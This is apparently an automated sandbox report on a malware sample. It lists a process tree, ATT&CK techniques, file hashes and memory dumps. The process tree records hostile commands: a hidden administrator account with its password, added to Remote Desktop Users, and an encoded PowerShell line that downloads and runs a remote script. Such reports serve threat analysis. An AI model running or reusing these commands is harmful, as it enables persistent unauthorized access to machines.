C:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt /add
3⤵
PID:4148

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4256

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:4428

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4412

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
3⤵
PID:4552

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:4644

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc WVXHFeyt
1⤵
PID:4664

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc WVXHFeyt
2⤵
PID:4508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt
3⤵
PID:4504

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4452

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
PID:4752

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4812

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
PID:4708

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1924

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:4856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4880

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2541.tmp
MD5
964caa4f02b9565510e15c5ea910775e

SHA1
5edbecc35dc0f60ac7bdc585f9fd5cfa01a1a4c1

SHA256
91046f2ea431347ad3b742a063d6e121b4c31f5178249270eb5af85d36a2df13

SHA512
bb157a5259ed96e04cf46d97aed788e267351e2be6c13b0a6209add182d56d314813bb02f8ebbc41ac3f9ba288fc5dd6604930be0ac118bf6c97366193e99559

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.zip
MD5
36f178576dcb8db35d6f06448b1eb510

SHA1
62277c90cc2b1bb81b36571037afe5081b0605d5

SHA256
192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a

SHA512
9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
MD5
43473f4e719958639a9d89e5d8388999

SHA1
ccb79eb606a23daa4b3ff8f996a2fbf281f31491

SHA256
ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734

SHA512
1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.dll
MD5
471bdee090cb60e599f4a2d690d48217

SHA1
d368e433a07f421a88241b7481c80c3fc223759a

SHA256
a2e1a1b98b89f933e167713e797115e8abbe36e1442a439b3818fb54bd2bacf8

SHA512
da02b03573279cf5208d2386a44a87bd6c1c04f0b549d381952898e4463f290aa9d1f6259d15a5d60208e36041dbdea8c68f0475993ed8e1f84311e738342fe5

Download Submit
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
MD5
eaee663dfeb2efcd9ec669f5622858e2

SHA1
2b96f0d568128240d0c53b2a191467fde440fd93

SHA256
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2

SHA512
211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3

Download Submit
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
MD5
eaee663dfeb2efcd9ec669f5622858e2

SHA1
2b96f0d568128240d0c53b2a191467fde440fd93

SHA256
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2

SHA512
211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3

Download Submit
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
MD5
c9622e294a0f3c6c4dfcf716cd2e6692

SHA1
829498d010f331248be9fd512deb44d1eceac344

SHA256
f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe

SHA512
d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552

Download Submit
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
MD5
c9622e294a0f3c6c4dfcf716cd2e6692

SHA1
829498d010f331248be9fd512deb44d1eceac344

SHA256
f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe

SHA512
d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552

Download Submit
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
MD5
27cfb3990872caa5930fa69d57aefe7b

SHA1
5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f

SHA256
43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146

SHA512
a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a

Download Submit
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
MD5
27cfb3990872caa5930fa69d57aefe7b

SHA1
5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f

SHA256
43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146

SHA512
a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a

Download Submit
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
MD5
ad0967a0ab95aa7d71b3dc92b71b8f7a

SHA1
ed63f517e32094c07a2c5b664ed1cab412233ab5

SHA256
9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc

SHA512
85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP
MD5
d003565ffac3c9d41df58b063e7ba3a0

SHA1
28134aeacf9867ce14300ff2376923de29161616

SHA256
b994ca66addbbc61e7c9959f17e3afac0132a32ced45e809f53ef993635d1363

SHA512
387c39aaf40125af803871e744970bcd2fa357a9e642b8d8a98f7e01ef128eab58543a4e1aa5d3540d2fbfc69c1d9c98c957eb5e2dce8a09dcab3ff3fcf3163d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.0.cs
MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline
MD5
1bf5abca04dfa636d13c54b3fa9b3e86

SHA1
86b76191802aedaec09c009c39ed93fbcbea82c4

SHA256
77191771e93606772bdcd1707b337d80a76c7346ea0753d8d5ee2a98607d0826

SHA512
a295f20c3dc2a4dd18acb880940599ac275be1d4261e75c1b7ae2fee0fb28c6e65f23185e1f65179ac3467dd72769e4cc0ef2039cfc7b758aa6f355e0c1444bc

Download Submit
\Windows\Branding\mediasrv.png
MD5
271eacd9c9ec8531912e043bc9c58a31

SHA1
c86e20c2a10fd5c5bae4910a73fd62008d41233b

SHA256
177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934

SHA512
87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

Download Submit
\Windows\Branding\mediasvc.png
MD5
1fa9c1e185a51b6ed443dd782b880b0d

SHA1
50145abf336a196183882ef960d285bd77dd3490

SHA256
f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959

SHA512
16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc

Download Submit
memory/2396-119-0x0000000000000000-mapping.dmp

Download
memory/2412-128-0x00000192D1BC5000-0x00000192D1BC6000-memory.dmp

Filesize
4KB

Download
memory/2412-129-0x00000192D1BC6000-0x00000192D1BC7000-memory.dmp

Filesize
4KB

Download
memory/2412-127-0x00000192D1BC3000-0x00000192D1BC5000-memory.dmp

Filesize
8KB

Download
memory/2412-124-0x00000192D1E90000-0x00000192D213A000-memory.dmp

Filesize
2.7MB

Download
memory/2412-123-0x00000192D1BC0000-0x00000192D1BC2000-memory.dmp

Filesize
8KB

Download
memory/2412-118-0x0000000000000000-mapping.dmp

Download
memory/2460-151-0x0000000000000000-mapping.dmp

Download
memory/2684-358-0x0000000000000000-mapping.dmp

Download
memory/3292-145-0x0000020B75CE3000-0x0000020B75CE5000-memory.dmp

Filesize
8KB

Download
memory/3292-167-0x0000020B76760000-0x0000020B76761000-memory.dmp

Filesize
4KB

Download
memory/3292-144-0x0000020B75F70000-0x0000020B75F71000-memory.dmp

Filesize
4KB

Download
memory/3292-134-0x0000000000000000-mapping.dmp

Download
memory/3292-143-0x0000020B75CE0000-0x0000020B75CE2000-memory.dmp

Filesize
8KB

Download
memory/3292-166-0x0000020B763D0000-0x0000020B763D1000-memory.dmp

Filesize
4KB

Download
memory/3292-158-0x0000020B75C90000-0x0000020B75C91000-memory.dmp

Filesize
4KB

Download
memory/3292-139-0x0000020B75C40000-0x0000020B75C41000-memory.dmp

Filesize
4KB

Download
memory/3292-160-0x0000020B75CE6000-0x0000020B75CE8000-memory.dmp

Filesize
8KB

Download
memory/3292-165-0x0000020B75CE8000-0x0000020B75CE9000-memory.dmp

Filesize
4KB

Download
memory/3500-142-0x0000000003140000-0x0000000003142000-memory.dmp

Filesize
8KB

Download
memory/3500-130-0x0000000000000000-mapping.dmp

Download
memory/3612-360-0x0000000000000000-mapping.dmp

Download
memory/3700-359-0x0000000000000000-mapping.dmp

Download
memory/3904-117-0x0000000005C00000-0x0000000005C01000-memory.dmp

Filesize
4KB

Download
memory/3904-114-0x0000000000C90000-0x0000000000C91000-memory.dmp

Filesize
4KB

Download
memory/3904-116-0x0000000005BC0000-0x0000000005BF1000-memory.dmp

Filesize
196KB

Download
memory/3960-357-0x0000000000000000-mapping.dmp

Download
memory/3972-154-0x0000000000000000-mapping.dmp

Download
memory/4000-463-0x0000000000000000-mapping.dmp

Download
memory/4000-369-0x0000000000000000-mapping.dmp

Download
memory/4028-174-0x0000000000000000-mapping.dmp

Download
memory/4028-223-0x0000021D06648000-0x0000021D0664A000-memory.dmp

Filesize
8KB

Download
memory/4028-184-0x0000021D06643000-0x0000021D06645000-memory.dmp

Filesize
8KB

Download
memory/4028-183-0x0000021D06640000-0x0000021D06642000-memory.dmp

Filesize
8KB

Download
memory/4028-203-0x0000021D06646000-0x0000021D06648000-memory.dmp

Filesize
8KB

Download
memory/4112-361-0x0000000000000000-mapping.dmp

Download
memory/4124-362-0x0000000000000000-mapping.dmp

Download
memory/4144-224-0x000001BE87CD0000-0x000001BE87CD2000-memory.dmp

Filesize
8KB

Download
memory/4144-267-0x000001BE87CD8000-0x000001BE87CDA000-memory.dmp

Filesize
8KB

Download
memory/4144-225-0x000001BE87CD3000-0x000001BE87CD5000-memory.dmp

Filesize
8KB

Download
memory/4144-216-0x0000000000000000-mapping.dmp

Download
memory/4144-266-0x000001BE87CD6000-0x000001BE87CD8000-memory.dmp

Filesize
8KB

Download
memory/4148-368-0x0000000000000000-mapping.dmp

Download
memory/4164-462-0x0000000000000000-mapping.dmp

Download
memory/4216-367-0x0000000000000000-mapping.dmp

Download
memory/4308-365-0x0000000000000000-mapping.dmp

Download
memory/4328-366-0x0000000000000000-mapping.dmp

Download
memory/4404-269-0x00000201FE4A0000-0x00000201FE4A2000-memory.dmp

Filesize
8KB

Download
memory/4404-301-0x00000201FE4A6000-0x00000201FE4A8000-memory.dmp

Filesize
8KB

Download
memory/4404-270-0x00000201FE4A3000-0x00000201FE4A5000-memory.dmp

Filesize
8KB

Download
memory/4404-254-0x0000000000000000-mapping.dmp

Download
memory/4404-302-0x00000201FE4A8000-0x00000201FE4AA000-memory.dmp

Filesize
8KB

Download
memory/4428-370-0x0000000000000000-mapping.dmp

Download
memory/4504-376-0x0000000000000000-mapping.dmp

Download
memory/4508-375-0x0000000000000000-mapping.dmp

Download
memory/4532-371-0x0000000000000000-mapping.dmp

Download
memory/4552-372-0x0000000000000000-mapping.dmp

Download
memory/4620-373-0x0000000000000000-mapping.dmp

Download
memory/4644-374-0x0000000000000000-mapping.dmp

Download
memory/4708-378-0x0000000000000000-mapping.dmp

Download
memory/4752-377-0x0000000000000000-mapping.dmp

Download
memory/4824-312-0x0000000000000000-mapping.dmp

Download
memory/4844-313-0x0000000000000000-mapping.dmp

Download
memory/4856-379-0x0000000000000000-mapping.dmp

Download
memory/4864-314-0x0000000000000000-mapping.dmp

Download
memory/4880-395-0x000001BBB9EA6000-0x000001BBB9EA8000-memory.dmp

Filesize
8KB

Download
memory/4880-380-0x0000000000000000-mapping.dmp

Download
memory/4880-391-0x000001BBB9EA0000-0x000001BBB9EA2000-memory.dmp

Filesize
8KB

Download
memory/4880-392-0x000001BBB9EA3000-0x000001BBB9EA5000-memory.dmp

Filesize
8KB

Download
memory/4880-446-0x000001BBB9EA8000-0x000001BBB9EA9000-memory.dmp

Filesize
4KB

Download
memory/5044-351-0x0000000000000000-mapping.dmp

Download
memory/5064-352-0x0000000000000000-mapping.dmp

Download
memory/5096-355-0x0000000000000000-mapping.dmp

Download
memory/5112-356-0x0000000000000000-mapping.dmp

Download